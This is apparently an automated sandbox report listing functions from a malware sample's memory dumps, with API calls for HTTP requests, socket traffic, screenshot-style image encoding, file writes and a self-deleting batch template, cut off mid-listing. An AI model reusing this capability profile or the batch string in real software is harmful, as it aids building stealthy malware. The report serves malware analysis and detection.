Function 00C507DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71

APIs

InternetSetOptionA.WININET(?,00000003,00C26FA4,00000004), ref: 00C50805

Part of subcall function 00C46FD3: EnterCriticalSection.KERNEL32(00C63510,?,00C44693,?,00C449A5,?,?,00000001), ref: 00C46FE3
Part of subcall function 00C46FD3: LeaveCriticalSection.KERNEL32(00C63510,?,00C44693,?,00C449A5,?,?,00000001), ref: 00C47009

GetAcceptLanguagesA.SHLWAPI ref: 00C5084C
memcpy.MSVCRT ref: 00C50886
HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 00C508BF

Strings

Accept-Language: , xrefs: 00C50880

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCAD53, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49

APIs

Part of subcall function 00FE6FD3: EnterCriticalSection.KERNEL32(01003510,?,00FE4693,?,00FE49A5,?,?,00000001), ref: 00FE6FE3
Part of subcall function 00FE6FD3: LeaveCriticalSection.KERNEL32(01003510,?,00FE4693,?,00FE49A5,?,?,00000001), ref: 00FE7009

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FCADA3
GetProcAddress.KERNEL32(?,GetProductInfo), ref: 00FCADB3
GetSystemDefaultUILanguage.KERNEL32(?,00FCAA9B), ref: 00FCADEE

Strings

kernel32.dll, xrefs: 00FCAD9E
GetProductInfo, xrefs: 00FCADAD

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2AD53, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49

APIs

Part of subcall function 00C46FD3: EnterCriticalSection.KERNEL32(00C63510,?,00C44693,?,00C449A5,?,?,00000001), ref: 00C46FE3
Part of subcall function 00C46FD3: LeaveCriticalSection.KERNEL32(00C63510,?,00C44693,?,00C449A5,?,?,00000001), ref: 00C47009

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C2ADA3
GetProcAddress.KERNEL32(?,GetProductInfo), ref: 00C2ADB3
GetSystemDefaultUILanguage.KERNEL32(?,00C2AA9B), ref: 00C2ADEE

Strings

kernel32.dll, xrefs: 00C2AD9E
GetProductInfo, xrefs: 00C2ADAD

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF5D27, Relevance: 8.3, APIs: 3, Strings: 1, Instructions: 81

APIs

GetTempPathW.KERNEL32(00000104), ref: 00FF5D3A
lstrcpyA.KERNEL32(?,00FC939A,00000000,00FF5FC9,?,?,?,00FF5FC9,?,?,?,?,?,?,?,00FDBD61), ref: 00FF5DD1
lstrcpynA.KERNEL32(?,?\C,00000003,?,00FC939A,00000000,00FF5FC9,?,?,?,00FF5FC9,?), ref: 00FF5DE7

Strings

?\C, xrefs: 00FF5DDC

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C55D27, Relevance: 8.3, APIs: 3, Strings: 1, Instructions: 81

APIs

GetTempPathW.KERNEL32(00000104), ref: 00C55D3A
lstrcpyA.KERNEL32(?,00C2939A,00000000,00C55FC9,?,?,?,00C55FC9,?,?,?,?,?,?,?,00C3BD61), ref: 00C55DD1
lstrcpynA.KERNEL32(?,?\C,00000003,?,00C2939A,00000000,00C55FC9,?,?,?,00C55FC9,?), ref: 00C55DE7

Strings

?\C, xrefs: 00C55DDC

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCD2F7, Relevance: 8.3, APIs: 2, Strings: 2, Instructions: 77

APIs

VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 00FCD315
VerQueryValueW.VERSION(?,?,?,?), ref: 00FCD382

Part of subcall function 00FF3C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00FF3C98
Part of subcall function 00FF3C83: StrCmpIW.SHLWAPI(?,?), ref: 00FF3CA2

Strings

\VarFileInfo\Translation, xrefs: 00FCD30A
\StringFileInfo\%04x%04x\%s, xrefs: 00FCD357

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2D2F7, Relevance: 8.3, APIs: 2, Strings: 2, Instructions: 77

APIs

VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 00C2D315
VerQueryValueW.VERSION(?,?,?,?), ref: 00C2D382

Part of subcall function 00C53C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00C53C98
Part of subcall function 00C53C83: StrCmpIW.SHLWAPI(?,?), ref: 00C53CA2

Strings

\VarFileInfo\Translation, xrefs: 00C2D30A
\StringFileInfo\%04x%04x\%s, xrefs: 00C2D357

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD332C, Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 44

APIs

GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00FD3341
GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 00FD334C

Part of subcall function 00FD338D: GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 00FD33AB
Part of subcall function 00FD338D: GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 00FD33B6
Part of subcall function 00FD338D: GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 00FD33C1
Part of subcall function 00FD338D: lstrcmpiW.KERNEL32(?), ref: 00FD344E
Part of subcall function 00FD338D: memcpy.MSVCRT ref: 00FD3471
Part of subcall function 00FD338D: CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00FD349C
Part of subcall function 00FD338D: memcpy.MSVCRT ref: 00FD34CA

Strings

GdipCreateBitmapFromHBITMAP, xrefs: 00FD333A
GdipDisposeImage, xrefs: 00FD3343

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3332C, Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 44

APIs

GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00C33341
GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 00C3334C

Part of subcall function 00C3338D: GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 00C333AB
Part of subcall function 00C3338D: GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 00C333B6
Part of subcall function 00C3338D: GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 00C333C1
Part of subcall function 00C3338D: lstrcmpiW.KERNEL32(?), ref: 00C3344E
Part of subcall function 00C3338D: memcpy.MSVCRT ref: 00C33471
Part of subcall function 00C3338D: CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00C3349C
Part of subcall function 00C3338D: memcpy.MSVCRT ref: 00C334CA

Strings

GdipCreateBitmapFromHBITMAP, xrefs: 00C3333A
GdipDisposeImage, xrefs: 00C33343

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351D55A, Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 16

APIs

GetModuleHandleW.KERNEL32(mscoree.dll), ref: 0351D564
GetProcAddress.KERNEL32(?,CorExitProcess), ref: 0351D574

Strings

mscoree.dll, xrefs: 0351D55F
CorExitProcess, xrefs: 0351D56E

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FCCD5A, Relevance: 7.9, APIs: 5, Instructions: 109

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00FD3FA1), ref: 00FCCD70
LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00FD3FA1), ref: 00FCCE9F

Part of subcall function 00FCF0E1: memcmp.MSVCRT ref: 00FCF0FD

memcpy.MSVCRT ref: 00FCCDCD
LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00FD3FA1,?,00000002), ref: 00FCCDDD

Part of subcall function 00FF046D: EnterCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF047A
Part of subcall function 00FF046D: LeaveCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF0488

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00FCCE11

Part of subcall function 00FED95F: GetSystemTime.KERNEL32(?), ref: 00FED969

Part of subcall function 00FCEDAE: memcpy.MSVCRT ref: 00FCEDF9

Part of subcall function 00FCEEE2: memcpy.MSVCRT ref: 00FCEFC1
Part of subcall function 00FCEEE2: memcpy.MSVCRT ref: 00FCEFE2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2CD5A, Relevance: 7.9, APIs: 5, Instructions: 109

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1), ref: 00C2CD70
LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1), ref: 00C2CE9F

Part of subcall function 00C2F0E1: memcmp.MSVCRT ref: 00C2F0FD

memcpy.MSVCRT ref: 00C2CDCD
LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1,?,00000002), ref: 00C2CDDD

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00C2CE11

Part of subcall function 00C4D95F: GetSystemTime.KERNEL32(?), ref: 00C4D969

Part of subcall function 00C2EDAE: memcpy.MSVCRT ref: 00C2EDF9

Part of subcall function 00C2EEE2: memcpy.MSVCRT ref: 00C2EFC1
Part of subcall function 00C2EEE2: memcpy.MSVCRT ref: 00C2EFE2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE6C9A, Relevance: 7.9, APIs: 5, Instructions: 252

APIs

memcmp.MSVCRT ref: 00FE6D07
memcpy.MSVCRT ref: 00FE6E14

Part of subcall function 00FF2B3C: connect.WS2_32(?,?), ref: 00FF2B7A
Part of subcall function 00FF2B3C: WSAGetLastError.WS2_32(?,00000000,00000000), ref: 00FF2B89
Part of subcall function 00FF2B3C: WSASetLastError.WS2_32 ref: 00FF2BA7
Part of subcall function 00FF2B3C: WSAGetLastError.WS2_32 ref: 00FF2BA9
Part of subcall function 00FF2B3C: WSASetLastError.WS2_32(?), ref: 00FF2BE7

memcmp.MSVCRT ref: 00FE6F11

Part of subcall function 00FF2EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,00FCFD6D,?,00000004,00007530,?,?,?,?), ref: 00FF2ED9
Part of subcall function 00FF2EA3: WSASetLastError.WS2_32(?), ref: 00FF2F21

Part of subcall function 00FE6A51: memcmp.MSVCRT ref: 00FE6A97

Part of subcall function 00FE5D47: memset.MSVCRT ref: 00FE5D57
Part of subcall function 00FE5D47: memcpy.MSVCRT ref: 00FE5D80

memset.MSVCRT ref: 00FE6F76
memcpy.MSVCRT ref: 00FE6F87

Part of subcall function 00FE5D97: memcpy.MSVCRT ref: 00FE5DA8

Part of subcall function 00FE69A2: memcmp.MSVCRT ref: 00FE69DE

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C46C9A, Relevance: 7.9, APIs: 5, Instructions: 252

APIs

memcmp.MSVCRT ref: 00C46D07
memcpy.MSVCRT ref: 00C46E14

Part of subcall function 00C52B3C: connect.WS2_32(?,?), ref: 00C52B7A
Part of subcall function 00C52B3C: WSAGetLastError.WS2_32(?,00000000,00000000), ref: 00C52B89
Part of subcall function 00C52B3C: WSASetLastError.WS2_32 ref: 00C52BA7
Part of subcall function 00C52B3C: WSAGetLastError.WS2_32 ref: 00C52BA9
Part of subcall function 00C52B3C: WSASetLastError.WS2_32(?), ref: 00C52BE7

memcmp.MSVCRT ref: 00C46F11

Part of subcall function 00C52EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,00C2FD6D,?,00000004,00007530,?,?,?,?), ref: 00C52ED9
Part of subcall function 00C52EA3: WSASetLastError.WS2_32(?), ref: 00C52F21

Part of subcall function 00C46A51: memcmp.MSVCRT ref: 00C46A97

Part of subcall function 00C45D47: memset.MSVCRT ref: 00C45D57
Part of subcall function 00C45D47: memcpy.MSVCRT ref: 00C45D80

memset.MSVCRT ref: 00C46F76
memcpy.MSVCRT ref: 00C46F87

Part of subcall function 00C45D97: memcpy.MSVCRT ref: 00C45DA8

Part of subcall function 00C469A2: memcmp.MSVCRT ref: 00C469DE

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCD6C8, Relevance: 7.9, APIs: 5, Instructions: 86

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00FCD979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 00FCD6D2
memcpy.MSVCRT ref: 00FCD74E
memcpy.MSVCRT ref: 00FCD762
memcpy.MSVCRT ref: 00FCD78C
LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,00FCD979,00000001,?,00000000,?,?,?,00000000), ref: 00FCD7B2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2D6C8, Relevance: 7.9, APIs: 5, Instructions: 86

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00C2D979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 00C2D6D2
memcpy.MSVCRT ref: 00C2D74E
memcpy.MSVCRT ref: 00C2D762
memcpy.MSVCRT ref: 00C2D78C
LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,00C2D979,00000001,?,00000000,?,?,?,00000000), ref: 00C2D7B2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD5A4F, Relevance: 7.8, APIs: 4, Instructions: 27

APIs

GetLastError.KERNEL32(?,?,00FCB9B4), ref: 00FD5A51

Part of subcall function 00FE4B8D: WaitForSingleObject.KERNEL32(00000000,00FD63B6), ref: 00FE4B95

TlsGetValue.KERNEL32(?,?,00FCB9B4), ref: 00FD5A6E
TlsSetValue.KERNEL32(00000001), ref: 00FD5A80
SetLastError.KERNEL32(?,?,00FCB9B4), ref: 00FD5A90

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C35A4F, Relevance: 7.8, APIs: 4, Instructions: 27

APIs

GetLastError.KERNEL32(?,?,00C2B9B4), ref: 00C35A51

Part of subcall function 00C44B8D: WaitForSingleObject.KERNEL32(00000000,00C554CE), ref: 00C44B95

TlsGetValue.KERNEL32(?,?,00C2B9B4), ref: 00C35A6E
TlsSetValue.KERNEL32(00000001), ref: 00C35A80
SetLastError.KERNEL32(?,?,00C2B9B4), ref: 00C35A90

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FEB562, Relevance: 7.8, APIs: 5, Instructions: 133

APIs

memset.MSVCRT ref: 00FEB587
memcpy.MSVCRT ref: 00FEB5E7
memcpy.MSVCRT ref: 00FEB5FF

Part of subcall function 00FC9F94: memset.MSVCRT ref: 00FC9FA8

Part of subcall function 00FDBD8C: memset.MSVCRT ref: 00FDBE17

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00FEB66A
memcpy.MSVCRT ref: 00FEB6A8

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4B562, Relevance: 7.8, APIs: 5, Instructions: 133

APIs

memset.MSVCRT ref: 00C4B587
memcpy.MSVCRT ref: 00C4B5E7
memcpy.MSVCRT ref: 00C4B5FF

Part of subcall function 00C29F94: memset.MSVCRT ref: 00C29FA8

Part of subcall function 00C3BD8C: memset.MSVCRT ref: 00C3BE17

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00C4B66A
memcpy.MSVCRT ref: 00C4B6A8

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD6D60, Relevance: 7.8, APIs: 4, Instructions: 68

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00FD6D88
recv.WS2_32(?,?,00000400,00000000), ref: 00FD6DB4
send.WS2_32(?,?,?,00000000), ref: 00FD6DD6
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00FD6E03

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C36D60, Relevance: 7.8, APIs: 4, Instructions: 68

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00C36D88
recv.WS2_32(?,?,00000400,00000000), ref: 00C36DB4
send.WS2_32(?,?,?,00000000), ref: 00C36DD6
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00C36E03

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCC907, Relevance: 7.8, APIs: 4, Instructions: 66

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,00FCCB5E,?), ref: 00FCC961
LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,00FCCB5E,?), ref: 00FCC9C9

Part of subcall function 00FCC3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FCC404

Part of subcall function 00FD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00FD6A43
Part of subcall function 00FD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?), ref: 00FD6A56

InterlockedIncrement.KERNEL32 ref: 00FCC99E
SetEvent.KERNEL32 ref: 00FCC9BC

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2C907, Relevance: 7.8, APIs: 4, Instructions: 66

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,00C2CB5E,?), ref: 00C2C961
LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,00C2CB5E,?), ref: 00C2C9C9

Part of subcall function 00C2C3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C2C404

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

InterlockedIncrement.KERNEL32 ref: 00C2C99E
SetEvent.KERNEL32 ref: 00C2C9BC

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD5B40, Relevance: 7.7, APIs: 4, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(?,7C809F91,?,00FCD091,?,?,00000000,0000EA60,00000000), ref: 00FD5B48
WaitForSingleObject.KERNEL32(?,00000000), ref: 00FD5B6C
CloseHandle.KERNEL32 ref: 00FD5B7C

Part of subcall function 00FD69C9: HeapAlloc.KERNEL32(00000000,?,?,00FF4E9D,00FC9851,?,?,00FF4FB1,?,?,?,?,?,?,?,?), ref: 00FD69F3
Part of subcall function 00FD69C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00FF4E9D,00FC9851,?,?,00FF4FB1,?,?,?,?,?,?), ref: 00FD6A06

LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00FCD091,?,?,00000000,0000EA60,00000000), ref: 00FD5BAC

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C35B40, Relevance: 7.7, APIs: 4, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(?,7C809F91,?,00C2D091,?,?,00000000,0000EA60,00000000), ref: 00C35B48
WaitForSingleObject.KERNEL32(?,00000000), ref: 00C35B6C
CloseHandle.KERNEL32 ref: 00C35B7C

Part of subcall function 00C369C9: HeapAlloc.KERNEL32(00000000,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?,?,?), ref: 00C369F3
Part of subcall function 00C369C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?), ref: 00C36A06

LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00C2D091,?,?,00000000,0000EA60,00000000), ref: 00C35BAC

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD8459, Relevance: 7.7, APIs: 4, Instructions: 207

APIs

EnterCriticalSection.KERNEL32(01111FCC,6FFF0400), ref: 00FD84C0

Part of subcall function 00FD81D6: GetTickCount.KERNEL32 ref: 00FD81DE

LeaveCriticalSection.KERNEL32(01111FCC), ref: 00FD869F

Part of subcall function 00FD8339: IsBadReadPtr.KERNEL32 ref: 00FD8405
Part of subcall function 00FD8339: IsBadReadPtr.KERNEL32 ref: 00FD8424

getservbyname.WS2_32(?,00000000), ref: 00FD853A

Part of subcall function 00FD8A90: memcpy.MSVCRT ref: 00FD8C64
Part of subcall function 00FD8A90: memcpy.MSVCRT ref: 00FD8D64

Part of subcall function 00FD8770: memcpy.MSVCRT ref: 00FD8944
Part of subcall function 00FD8770: memcpy.MSVCRT ref: 00FD8A44

memcpy.MSVCRT ref: 00FD8619

Part of subcall function 00FF2471: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,01002910,?,?), ref: 00FF249E

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FD8162: TlsAlloc.KERNEL32(01111FCC,00FD8636,?,?,?,?,01111FC0,?), ref: 00FD816B
Part of subcall function 00FD8162: TlsGetValue.KERNEL32(?,00000001,01111FCC), ref: 00FD817D
Part of subcall function 00FD8162: TlsSetValue.KERNEL32(?,?), ref: 00FD81C2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C38459, Relevance: 7.7, APIs: 4, Instructions: 207

APIs

EnterCriticalSection.KERNEL32(0000000C,00000000), ref: 00C384C0

Part of subcall function 00C381D6: GetTickCount.KERNEL32 ref: 00C381DE

LeaveCriticalSection.KERNEL32(0000000C), ref: 00C3869F

Part of subcall function 00C38339: IsBadReadPtr.KERNEL32 ref: 00C38405
Part of subcall function 00C38339: IsBadReadPtr.KERNEL32 ref: 00C38424

getservbyname.WS2_32(?,00000000), ref: 00C3853A

Part of subcall function 00C38A90: memcpy.MSVCRT ref: 00C38C64
Part of subcall function 00C38A90: memcpy.MSVCRT ref: 00C38D64

Part of subcall function 00C38770: memcpy.MSVCRT ref: 00C38944
Part of subcall function 00C38770: memcpy.MSVCRT ref: 00C38A44

memcpy.MSVCRT ref: 00C38619

Part of subcall function 00C52471: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00C62910,?,?), ref: 00C5249E

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C38162: TlsAlloc.KERNEL32(0000000C,00C38636,?,?,?,?,00000000,?), ref: 00C3816B
Part of subcall function 00C38162: TlsGetValue.KERNEL32(?,00000001,0000000C), ref: 00C3817D
Part of subcall function 00C38162: TlsSetValue.KERNEL32(?,?), ref: 00C381C2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD5E12, Relevance: 7.7, APIs: 5, Instructions: 68

APIs

EnterCriticalSection.KERNEL32(01003510), ref: 00FD5E33
LeaveCriticalSection.KERNEL32(01003510), ref: 00FD5E59

Part of subcall function 00FD5DBC: InitializeCriticalSection.KERNEL32(01003648), ref: 00FD5DC1
Part of subcall function 00FD5DBC: memset.MSVCRT ref: 00FD5DD0

EnterCriticalSection.KERNEL32(01003648), ref: 00FD5E64
LeaveCriticalSection.KERNEL32(01003648), ref: 00FD5EDC

Part of subcall function 00FCA509: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FCA54A
Part of subcall function 00FCA509: PathRenameExtensionW.SHLWAPI(?,?), ref: 00FCA59B

Part of subcall function 00FCA5B2: memset.MSVCRT ref: 00FCA757
Part of subcall function 00FCA5B2: memcpy.MSVCRT ref: 00FCA780
Part of subcall function 00FCA5B2: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00FCA885
Part of subcall function 00FCA5B2: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00FCA8A1

Sleep.KERNEL32(000007D0), ref: 00FD5ECF

Part of subcall function 00FCA947: memset.MSVCRT ref: 00FCA969

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C35E12, Relevance: 7.7, APIs: 5, Instructions: 68

APIs

EnterCriticalSection.KERNEL32(00C63510), ref: 00C35E33
LeaveCriticalSection.KERNEL32(00C63510), ref: 00C35E59

Part of subcall function 00C35DBC: InitializeCriticalSection.KERNEL32(00C63648), ref: 00C35DC1
Part of subcall function 00C35DBC: memset.MSVCRT ref: 00C35DD0

EnterCriticalSection.KERNEL32(00C63648), ref: 00C35E64
LeaveCriticalSection.KERNEL32(00C63648), ref: 00C35EDC

Part of subcall function 00C2A509: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C2A54A
Part of subcall function 00C2A509: PathRenameExtensionW.SHLWAPI(?,?), ref: 00C2A59B

Part of subcall function 00C2A5B2: memset.MSVCRT ref: 00C2A757
Part of subcall function 00C2A5B2: memcpy.MSVCRT ref: 00C2A780
Part of subcall function 00C2A5B2: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00C2A885
Part of subcall function 00C2A5B2: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C2A8A1

Sleep.KERNEL32(000007D0), ref: 00C35ECF

Part of subcall function 00C2A947: memset.MSVCRT ref: 00C2A969

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FDF7DB, Relevance: 7.7, APIs: 5, Instructions: 217

APIs

LoadLibraryW.KERNEL32(?), ref: 00FDF838
GetProcAddress.KERNEL32(?,?), ref: 00FDF860
StrChrA.SHLWAPI(?,00000040), ref: 00FDF987

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

StrChrW.SHLWAPI(?,00000040,?,?), ref: 00FDF968

Part of subcall function 00FEC3E0: lstrlenW.KERNEL32(00FC7C5C), ref: 00FEC3FC
Part of subcall function 00FEC3E0: lstrlenW.KERNEL32(?), ref: 00FEC402
Part of subcall function 00FEC3E0: memcpy.MSVCRT ref: 00FEC426

FreeLibrary.KERNEL32 ref: 00FDFA6D

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3F7DB, Relevance: 7.7, APIs: 5, Instructions: 217

APIs

LoadLibraryW.KERNEL32(?), ref: 00C3F838
GetProcAddress.KERNEL32(?,?), ref: 00C3F860
StrChrA.SHLWAPI(?,00000040), ref: 00C3F987

